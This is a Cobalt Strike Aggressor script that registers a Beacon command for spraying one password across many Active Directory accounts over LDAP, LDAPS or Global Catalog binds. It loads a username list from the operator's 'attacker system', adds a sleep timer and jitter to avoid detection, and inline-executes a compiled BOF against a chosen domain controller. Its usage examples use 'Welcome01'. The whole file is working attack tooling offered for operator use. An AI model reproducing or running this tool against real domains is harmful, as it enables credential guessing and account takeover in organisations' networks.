# author Western Tactics

beacon_command_register(
	"passwordsprayad", "Validate single password against multiple accounts using LDAP/LDAPS/GC/GCS authentication.",
	"INFO:\nValidate single password against multiple accounts using LDAP, LDAPS, GC, or GCS simple bind authentication.\n\n" .
	"ARGUMENTS:\n[protocol]: the protocol to use (ldap, ldaps, gc, or gcs).\n[path to username file]: the path on your own attacker system to a file containing the list with usernames. Each username must be newline separated.\n[password]: the password to validate.\n[domain]: FQDN of the domain.\n[dc]: Hostname or IP of the Domain Controller to target.\n[sleeptimer]: (optional) sleep timer in seconds to wait between each authentication attempt (default is 5).\n[jitter]: (optional) jitter in percentage (default 20).\n\n" .
	"USAGE:\npasswordsprayad <ldap|ldaps|gc|gcs> <path to username file> <password> <domain> <dc> [opt <sleeptimer>] [opt <jitter>]\n\n" .
	"EXAMPLES:\npasswordsprayad gc C:/Users/redmed/Documents/usernames.txt Welcome01 example.local dc01.example.local 10 40\npasswordsprayad ldaps C:/Users/redmed/Documents/usernames.txt Welcome01 example.local dc01.example.local\n\n");
	
alias passwordsprayad {
	$bid = $1;
	$proto = $2;
	$path = $3;
	$password = $4;
	$domain = $5;
	$dc = $6;
	$timer = $7;
	$jitter = $8;
	
	$path = strrep($path, "\\", "/");
	
	if ($proto eq "" || ($proto ne "ldap" && $proto ne "ldaps" && $proto ne "gc" && $proto ne "gcs")) {
		berror($bid, "Please specify a valid protocol: ldap, ldaps, gc, or gcs.\n");
		return;
	}

	if ($path eq "") {
		berror($bid, "Please specify the path on your own attacker system to the file containing the list with newline separated usernames.\n");
		return;
	}
	
	if ($password eq "" || $domain eq "" || $dc eq "") {
		berror($bid, "Please specify password, domain name (FQDN), and the target Domain Controller.");
		return;
	}

	# Set defaults if not provided
	if ($timer eq "") {
		$timer = 5;
	}
	if ($jitter eq "") {
		$jitter = 20;
	}

	# read in the .txt file
	$handle = openf("$path");
	if ($handle is $null) {
		berror($bid, "Could not open username file: $path");
		return;
	}
	$file = readb($handle, -1);
	closef($handle);
	
	# Read in the right BOF file
	$handle = openf(script_resource("passwordsprayad.o"));
	if ($handle is $null) {
		berror($bid, "Could not find BOF file: passwordspraypro.o");
		return;
	}
	$data = readb($handle, -1);
	closef($handle);

	# Pack our arguments
	# b: file, Z: password, Z: domain, Z: dc, z: proto, i: timer, i: jitter
	$arg_data = bof_pack($bid, "bZZZzii", $file, $password, $domain, $dc, $proto, $timer, $jitter);

	blog($bid, "Tasked to start $proto password spraying against $dc $+ ...");
	beacon_inline_execute($bid, $data, "go", $arg_data);
}